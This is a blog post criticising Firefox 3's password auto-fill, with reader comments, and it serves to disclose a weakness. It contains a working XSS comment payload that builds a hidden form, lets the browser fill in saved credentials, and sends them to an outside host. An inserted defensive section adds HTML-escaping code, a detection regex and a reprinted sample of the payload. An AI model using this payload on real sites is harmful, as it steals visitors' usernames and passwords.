I am in your Firefox, stealing your Passwords

The Firefox developers have their security and usability priorities all muddled up. You can't access my self-signed website, but I can steal your passwords without you even knowing. And they think this makes your browser better.

In Firefox 3, they introduced stricter SSL certificate checks that give you an error page that you can't turn off. It's a usability nightmare if it's a site you want to get into; there are 4 mouse clicks, all over the screen, to add the site - amusingly, 5 if you only want to add it temporarily. Reminds me of Vista UAC. Extremely annoying for people who may run several HTTPS sites on a dev machine, or who need to access scripts on specific machines behind a load-balanced secure site, for example.

Sacrificing usability for security is something I can forgive, even condone - although I can't see quite what's so bad about the way IE 7 does it, with a big warning saying "Actually, you don't want to open this". However, it's not a sacrifice Firefox wants to make across the board. Look at the password manager.

Just log in once, and whenever you open another page on the site that prompts for your username and password, it'll pre-populate it for you. Handy, eh?

I'm not talking about an autocomplete option when you start typing, like they do in IE; no, it fills it out for you as soon as you open the page. I thought this was new to FF3, but looking back they've been doing it in FF2 too.

Significant usability gain? No. In fact, they've "improved" form detection in FF3 and have made it a usability nightmare. Now it does it anywhere it finds a password field, regardless of context. Imagine a form on a site that prompts you for a password to a different resource; it's now always populated with the wrong password. Or more commonly, imagine a form that lets you change your details, and has a field to change your password if you provide your current one. Click save and *ding*! Error! Or even better, you've now got a blank password (and don't know why you can't log back in). Now they're sacrificing usability for usability!

Bugzilla comments say if you've got a form like that, you should set the autocomplete="no" form attribute. Great, but that's like saying they're now not going to render HTML if it contains presentational markup - I'm screwed on a major proportion of sites I use.

But wait, why am I talking about mere annoyances, when I can be talking about a vulnerability, at least when combined with XSS. Let me show you:

  1. Log in to a site that doesn't parse user comments properly.
  2. Leave a new comment:
    I LOVE THIS SITE, AAA+++++++=+++!!!1!
    <script>
    document.write('<form style="display:none">' +
      '<input type="text" name="username" id="username">' +
      '<input type="password" name="password"></form>');
    window.onload = function () {
      (new Image).src = 'http://radiac.net/capture?u=' +
        document.getElementsByName('username')[0].value +
        '&p=' + document.getElementsByName('password')[0].value;
    }
    </script>

  3. Profit.

That's just the quick version before we start trying. And the best bit? There are bug reports about this in Bugzilla going back to 2006. The response to that bug was the same as to similar bugs being submitted now:

I don't think we should sacrifice usability this much just to slightly mitigate the effect of a successful XSS attack.

Slightly mitigate the effect? Slightly?! I just stole all your visitors' usernames and passwords!

Other comments say once a site's been injected with malicious code, it's already game over, but this isn't some obscure Quicktime hack that'll only last until the next bug fix - this is an officially sanctioned feature. With this, it doesn't matter if I can't inject code onto the login page to sniff keypresses, or if you do clever stuff with your session cookies to make sure they can't be copied - all I need is one tiny corner of your site, and I have their password. I am now them.

Still, at least they don't have to click two buttons to select their login from the dropdown. I'm sure that'll keep them happy while I'm finding out which other sites I can now access. Please, just let me get one for play.

Update: If you use Firefox and are looking for a way to save yourself from this issue, the Mozilla site has information on how to turn off form autocompletion.
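The update above covers the browser-side setting; the site-side fix for the root cause in the comment-injection example (a site that doesn't parse user comments properly) is to escape user content before it reaches the page, so no injected form or password field ever exists for the password manager to fill. This is an added example, not code from the original post or from Mozilla; the function names, the sample comment and the audit heuristic are all constructed here.

```javascript
// Added example: escape untrusted comment text before rendering it, so the
// injected <form>/<script> from the post is shown as literal text and never
// becomes DOM. (The form attribute the Bugzilla comments refer to is spelled
// autocomplete="off" in HTML; it is a band-aid, escaping is the real fix.)

const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escape the five HTML metacharacters; safe for text and quoted-attribute context.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => ESCAPES[ch]);
}

// Build the markup for one comment. Only escaped values are interpolated,
// so a comment body cannot open a tag of its own.
function renderComment(author, body) {
  return '<div class="comment"><b>' + escapeHtml(author) + '</b>: ' +
         escapeHtml(body) + '</div>';
}

// Audit helper for comments already stored unescaped: flags bodies carrying
// raw tags that could inject a credential-harvesting form. A hit means the
// stored comment needs re-rendering through escapeHtml (or removal); it is
// a detection aid, not a substitute for escaping on output.
function looksLikeMarkupInjection(body) {
  return /<\s*(script|form|input|iframe)\b/i.test(body);
}

// Constructed sample mirroring the payload in the post.
const MALICIOUS_COMMENT =
  'I LOVE THIS SITE, AAA+++++++=+++!!!1!\n' +
  '<script>document.write(\'<form style="display:none">\' +\n' +
  '  \'<input type="text" name="username">\' +\n' +
  '  \'<input type="password" name="password"></form>\');</script>';

// Rendered output contains &lt;script&gt; and &lt;form, never a live tag.
console.log(renderComment('attacker', MALICIOUS_COMMENT));
console.log('audit flag:', looksLikeMarkupInjection(MALICIOUS_COMMENT));
```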

Comments

It all sounds like a reasonable complaint. I'd never have noticed it, though, had you not mentioned it, since my default setting for remembering passwords is "no". I'm certainly not going to let my browser do that.

In my opinion, remembering passwords shouldn't even be an option, and I've done my best to disable it on the sites I create. I want my users to be aware of what their passwords are at all times, since at some point, they are going to need it - and I don't want them poking their head into my office every 5 minutes asking for a new one.

Good luck with getting the Mozilla people to acknowledge it, though. The couple of times I've tried to bring stuff to their attention their reaction has been that they know best, and that they design for the majority of users - to the extent of leaving out options that would only be useful to the minority (such as stuff for mass installations in a university style setting...)

I set remember passwords to off on anything important, but it's handy for a few sites with non-persistent sessions that I have to log into several times a day.

Mozilla seem so hell-bent on gaining more market share that they're forgetting the devs and admins who have got them where they are today. Thanks to Firefox 3, they've certainly moved up a few spots on my list - right in between Wikipedia deletionists and Debian package maintainers.

Browsers have got to be the worst place to keep passwords. Of ways that attackers have into your system, your web browser has to be up there as one of the easiest.
